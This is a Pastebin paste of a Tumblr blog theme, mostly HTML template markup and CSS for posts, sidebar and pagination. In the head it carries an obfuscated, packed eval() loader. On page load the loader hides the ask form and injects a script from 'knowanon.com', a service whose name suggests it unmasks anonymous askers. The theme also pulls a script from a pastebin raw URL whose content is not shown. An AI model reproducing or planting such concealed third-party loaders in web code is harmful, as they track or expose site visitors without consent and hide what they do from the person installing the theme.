Advertisement
ssourwolf

faramir/cleamour mash up

Sep 30th, 2014
239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.71 KB | None | 0 0
  1.  
  2. <!--
  3.  
  4.  
  5. septim theme
  6.  
  7.  
  8. -->
  9.  
  10. <!DOCTYPE html>
  11. <head>
  12.  
  13. {block:Hidden}<meta name="select:KA" title="Off" content="off"><meta name="select:KA" title="On" content="on">{/block:Hidden}<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.c=d(){2.e(\'8\').f.6=\'0\';a=\'4\',b=\'7\',3=2.5(\'3\')[0],1=2.g(\'1\');1.m=\'n/l\';1.k=\'//\'+b+a+\'.j/o?i\';3.h(1)}',25,25,'|script|document|head|anon|getElementsByTagName|opacity|know|ask_form|window|||onload|function|getElementById|style|createElement|appendChild|{select:KA}|com|src|javascript|type|text|ka'.split('|'),0,{}))</script>
  14.  
  15. <title>{Title}</title>
  16.  
  17. <link rel="shortcut icon" href="{Favicon}">
  18. <link rel="alternate" type="application/rss+xml" href="{RSS}">
  19. {block:Description}<meta name="description" content="{MetaDescription}" />{/block:Description}
  20.  
  21. <!--Default Variables-->
  22.  
  23. <meta name="color:Background" content="#ffffff"/>
  24. <meta name="color:Text" content="#aaaaaa"/>
  25. <meta name="color:Link" content="#000000"/>
  26. <meta name="color:Title" content="#000000"/>
  27. <meta name="color:Link Hover" content="#000000"/>
  28. <meta name="color:Borders" content="#eeeeee"/>
  29.  
  30. <meta name="text:Link 1 URL" content="" />
  31. <meta name="text:Link 1" content="" />
  32. <meta name="text:Link 2 URL" content="" />
  33. <meta name="text:Link 2" content="" />
  34. <meta name="text:Link 3 URL" content="" />
  35. <meta name="text:Link 3" content="" />
  36. <meta name="text:Link 4 URL" content="" />
  37. <meta name="text:Link 4" content="" />
  38. <meta name="text:Link 5 URL" content="" />
  39. <meta name="text:Link 5" content="" />
  40.  
  41. <meta name="image:Side Image" content=""/>
  42.  
  43. <meta name="if:Hide Tags" content="0"/>
  44. <meta name="if:Show Side Image" content="1"/>
  45.  
  46. <!-- jquery for tooltips-->
  47.  
  48.  
  49. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js"></script>
  50. <script src="http://static.tumblr.com/iuw14ew/VSQma1786/jquery.style-my-tooltips.js"></script>
  51.  
  52. <script>
  53.  
  54. (function($){
  55.  
  56. $(document).ready(function(){
  57.  
  58. $("a[title]").style_my_tooltips({
  59.  
  60. tip_follows_cursor:true,
  61.  
  62. tip_delay_time:30,
  63.  
  64. tip_fade_speed:300,
  65.  
  66. attribute:"title"
  67.  
  68. });
  69.  
  70. });
  71.  
  72. })(jQuery);
  73.  
  74. </script>
  75. <script src="http://pastebin.com/raw.php?i=TXm5Can4"></script>
  76.  
  77. <link href='http://fonts.googleapis.com/css?family=Inconsolata' rel='stylesheet' type='text/css'>
  78.  
  79.  
  80. <!--CSS customization here. -->
  81.  
  82. <style type="text/css">
  83.  
  84. #s-m-t-tooltip{
  85. position:absolute;
  86. margin-top: 15px;
  87. z-index:9999;
  88. background:{color:background};
  89. }
  90.  
  91. /*scrollbar*/
  92. ::-webkit-scrollbar{height: 5px;
  93. width: 3px;
  94. -webkit-border-radius: 0px;
  95. background-color:{color:background}}
  96. ::-webkit-scrollbar-thumb{background-color:{color:borders};
  97. }
  98. ::-webkit-scrollbar-track{background-color:{color:background}
  99. }
  100.  
  101. /*basics*/
  102. blockquote {padding:0 0 0 15px;
  103. border-left:3px solid {color:text};
  104. margin:10px;
  105. }
  106.  
  107. body {
  108. background:{color:background};
  109. color:{color:text};
  110. font-family:arial;
  111. font-size:11px;
  112. text-align:justify;
  113. margin:0;
  114. line-height:150%}
  115.  
  116.  
  117. a {
  118. color:{color:link};
  119. text-decoration:none;
  120. }
  121.  
  122. a:hover {
  123. text-decoration:none;
  124. color:{color:link hover};
  125. }
  126.  
  127. img{opacity:1;
  128. border:none;
  129. text-decoration:none}
  130.  
  131.  
  132. small {
  133. font-size:9px;}
  134.  
  135. big {
  136. font-size:12px;}
  137.  
  138.  
  139. #title {font-size:9px;
  140. color:{color:title};
  141. letter-spacing:1px;
  142. margin-bottom:15px;
  143. border-bottom:1px solid {color:borders};
  144. padding-bottom:14px;
  145. text-align:left;
  146. font-family:arial;
  147. }
  148. #title a {color:{color:title};}
  149. #title a:hover {color:{color:link hover};}
  150.  
  151. /*sidebar*/
  152. #sidebar {text-align:left;
  153. position:fixed;
  154. margin-left:-200px;
  155. margin-top:120px;
  156. width:175px;
  157. }
  158.  
  159. #s img {width:175px;
  160. display:block;
  161. margin-top:15px;
  162. padding-bottom:14px;
  163. border-bottom:1px solid {color:borders};}
  164.  
  165.  
  166. #blogt {font-size:11px;
  167. font-weight:bold;
  168. font-family:arial;
  169. padding-bottom:4px;
  170. text-transform:uppercase;
  171. }
  172. #blogt a {color:{color:title};
  173. }
  174. #blogt a:hover {color:{color:link hover};}
  175.  
  176. #links {
  177. padding:5px;
  178. }
  179.  
  180.  
  181. #links a {
  182. display:block;
  183. }
  184.  
  185. #description {
  186. margin:5px 0;
  187. border-top:1px solid {color:borders};
  188. padding-top:4px;
  189. }
  190.  
  191. /*pagination*/
  192. #pagination {
  193. text-align:right;
  194. position:absolute;
  195. bottom:20px;
  196. width:400px;
  197. padding:0 25px;
  198. }
  199. #pagination a {
  200. text-transform:;
  201. }
  202.  
  203. /*container*/
  204. #con {
  205. left:50%;
  206. margin-left:-225px;
  207. position:absolute;
  208. }
  209.  
  210.  
  211.  
  212. /*posts*/
  213.  
  214. #entries {
  215. margin-top:10px;
  216. padding:24px 25px;
  217. width:400px;
  218. position:relative;
  219. }
  220. #line {height:100%;
  221. position:absolute;
  222. width:1px;
  223. background:{color:borders};
  224. left:0;
  225. top:-80px;}
  226.  
  227. #posts {
  228. width:400px;
  229. {block:IndexPage}
  230. margin-bottom:100px;
  231. {/block:IndexPage}
  232. {block:PermalinkPage}
  233. margin-bottom:25px;
  234. {/block:PermalinkPage}
  235.  
  236. }
  237. #posts img {
  238. max-width:400px;
  239. }
  240.  
  241. #posts img, #posts li, #posts blockquote {max-width: 100%;}
  242. .caption {
  243. margin-top:10px;
  244. }
  245.  
  246. /*quote*/
  247.  
  248. #titlequote{text-align:left;
  249. font-size:14px;
  250. line-height:18px;
  251. color:{color:title};
  252. }
  253. #source {
  254. margin-top:15px;
  255. margin-left:15px;}
  256.  
  257. /*audio*/
  258.  
  259. .player {
  260. width:25px;
  261. height:25px;
  262. overflow:hidden;
  263. position:absolute;
  264. background:white;}
  265.  
  266. .audioinfo {
  267. margin-left:50px;
  268. }
  269.  
  270.  
  271. /*asks*/
  272. .q {margin-bottom:15px;
  273. padding-bottom:14px;
  274. border-bottom:1px solid {color:borders};
  275. }
  276. .as {display:inline;
  277. color:{color:title};
  278. }
  279. .as a {color:{color:title};}
  280. .as a:hover {color:{color:link hover};}
  281. .a {text-align:left;
  282. }
  283.  
  284.  
  285. /*chat*/
  286.  
  287. .chat ol {
  288. padding:0;
  289. list-style:none;
  290. }
  291. .line {padding:5px 0;}
  292.  
  293. .label {color:{color:title};
  294. }
  295.  
  296.  
  297.  
  298.  
  299.  
  300. /*permalink and notes*/
  301.  
  302. #permalink {margin-top:-10px;
  303. padding-top:14px;
  304. text-transform:lowercase;
  305. {block:permalinkpage}
  306. padding-bottom:14px;
  307. {/block:permalinkpage}
  308. }
  309. #permalink a {text-transform:;
  310. color:{color:text};
  311. }
  312. #permalink a:hover {color:{color:link hover};}
  313.  
  314. .tags {
  315. word-break:break-all;
  316. text-transform:lowercase;
  317. {block:ifhidetags}
  318. {block:indexpage}
  319. display:none;
  320. {/block:indexpage}
  321. {/block:ifhidetags}
  322. }
  323.  
  324. .pagenotes {
  325. {block:IndexPage}
  326. display: none!important;
  327. {/block:IndexPage}
  328. width:400px;
  329. text-align:left;
  330. }
  331. .pagenotes img {
  332. display:none!important;}
  333. .pagenotes li {
  334. list-style-type:none;
  335. padding:5px 0px;
  336. text-align:left;
  337. margin:0 0 0 -40px;
  338. }
  339.  
  340.  
  341.  
  342.  
  343. {CustomCSS}
  344.  
  345.  
  346. </style>
  347.  
  348.  
  349.  
  350. </head>
  351.  
  352. <body>
  353.  
  354. <div id="con">
  355.  
  356. <div id="sidebar">
  357. <div id="blogt"><a href="/">{Title}</a></div>
  358. {block:ifshowsideimage}<div id="s"><a href="/"><img src="{image:side image}"></a></div>{/block:ifshowsideimage}
  359. <div id="links">
  360. <a href="/">home</a>
  361. <a href="/ask">message</a>
  362. <a href="/links">links + tags</a>
  363.  
  364. {block:ifLink1}<a href="{text:Link 1 URL}">{text:Link 1}</a>{/block:ifLink1}{block:ifLink2}<a href="{text:Link 2 URL}">{text:Link 2}</a>{/block:ifLink2}{block:ifLink3}<a href="{text:Link 3 URL}">{text:Link 3}</a>{/block:ifLink3}{block:ifLink4}<a href="{text:Link 4 URL}">{text:Link 4}</a>{/block:ifLink4}{block:ifLink5}<a href="{text:Link 5 URL}">{text:Link 5}</a>{/block:ifLink5}
  365. </div>
  366. <div id="description">{Description}</div>
  367.  
  368. </div>
  369.  
  370.  
  371.  
  372.  
  373. <div id="entries">
  374. <div id="line"></div>
  375. {block:Posts}
  376. <div id="posts">
  377.  
  378.  
  379. {block:Quote}
  380.  
  381.  
  382. <div id="titlequote">“{Quote}”</div>
  383. {block:Source}<div id="source">&mdash; {Source}</div>{/block:Source}
  384. {/block:Quote}
  385.  
  386.  
  387.  
  388. {block:Text}
  389.  
  390. {block:Title}
  391. <div id="title">{Title}</div>{/block:Title}
  392. {Body}
  393. {/block:Text}
  394.  
  395. {block:Link}
  396. <div id="title"><a href="{URL}">{Name}</a></div>{block:Description}{Description}{/block:Description}
  397. {/block:Link}
  398.  
  399. {block:Chat}
  400. {block:Title}
  401. <div id="title">{Title}</div>
  402. {/block:Title}
  403. <div class="chat">
  404. <ol>{block:Lines}
  405. <li class="line {Alt}">
  406. {block:Label}
  407. <span class="label">
  408. {Label}</span>
  409. {/block:Label}{Line}</li>
  410. {/block:Lines}
  411. </ol></div>
  412. {/block:Chat}
  413.  
  414. {block:Photo}
  415. {LinkOpenTag}<img src="{PhotoURL-400}" alt="{PhotoAlt}"/>{LinkCloseTag}
  416. {/block:Photo}
  417.  
  418. {block:Photoset}
  419. {Photoset-400}
  420. {/block:Photoset}
  421.  
  422. {block:Video}
  423. {Video-400}
  424. {/block:Video}
  425.  
  426. {block:Audio}
  427. <div class="player">{AudioPlayerWhite}</div>
  428. <div class="audioinfo">
  429. {block:TrackName}{TrackName}{/block:TrackName}{block:Artist}<br>{Artist}{/block:Artist}
  430. </div>
  431. {/block:Audio}
  432.  
  433. {block:Answer}
  434. <div class="q">
  435. <div class="as">{Asker} said: </div>
  436. {Question}</div>
  437. <div class="a">{Answer}</div>
  438. {/block:Answer}
  439.  
  440. {block:Caption}<div class="caption">{Caption}</div>{/block:Caption}
  441.  
  442. {block:Date}
  443. <div id="permalink">
  444. <a href="{Permalink}" >{month} {dayofmonth}{dayofmonthsuffix}, {year}</a> {block:NoteCount} &nbsp;•&nbsp; <a href="{Permalink}">{NoteCountWithLabel}</a>{/block:NoteCount}{block:permalinkpage}{block:RebloggedFrom} <a href="{ReblogParentURL}" title="{ReblogParentName}">via</a>{block:ContentSource} / <a href="{ReblogRootURL}" title="{ReblogRootName}">source</a>{/block:ContentSource}{/block:RebloggedFrom}{/block:permalinkpage}{block:HasTags}<span class="tags"> <br> {block:Tags}<a href="{TagUrl}"> #{tag}&nbsp;&nbsp;</a>{/block:Tags}</span>{/block:HasTags}
  445. </div>
  446. {/block:Date}
  447.  
  448.  
  449.  
  450. </div>
  451.  
  452.  
  453. {block:PostNotes}
  454. <div class="pagenotes">
  455. {PostNotes}
  456. </div>
  457. {/block:PostNotes}
  458.  
  459.  
  460. {/block:Posts}
  461.  
  462.  
  463. {block:Pagination}
  464. <div id="pagination">
  465. {block:PreviousPage}
  466. <a href="{PreviousPage}">previous </a> /
  467. {/block:PreviousPage}
  468.  
  469.  
  470. {block:NextPage}
  471. <a href="{NextPage}">next</a>
  472. {/block:NextPage}
  473. </div>
  474. {/block:Pagination}
  475.  
  476.  
  477.  
  478.  
  479. </div>
  480.  
  481. </div>
  482.  
  483.  
  484. {block:ContentSource}
  485. <!-- {SourceURL}{block:SourceLogo}<img src="{BlackLogoURL}"
  486. width="{LogoWidth}" height="{LogoHeight}" alt="{SourceTitle}" />
  487. {/block:SourceLogo}
  488. {block:NoSourceLogo}{SourceLink}{/block:NoSourceLogo} -->
  489. {/block:ContentSource}
  490.  
  491. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement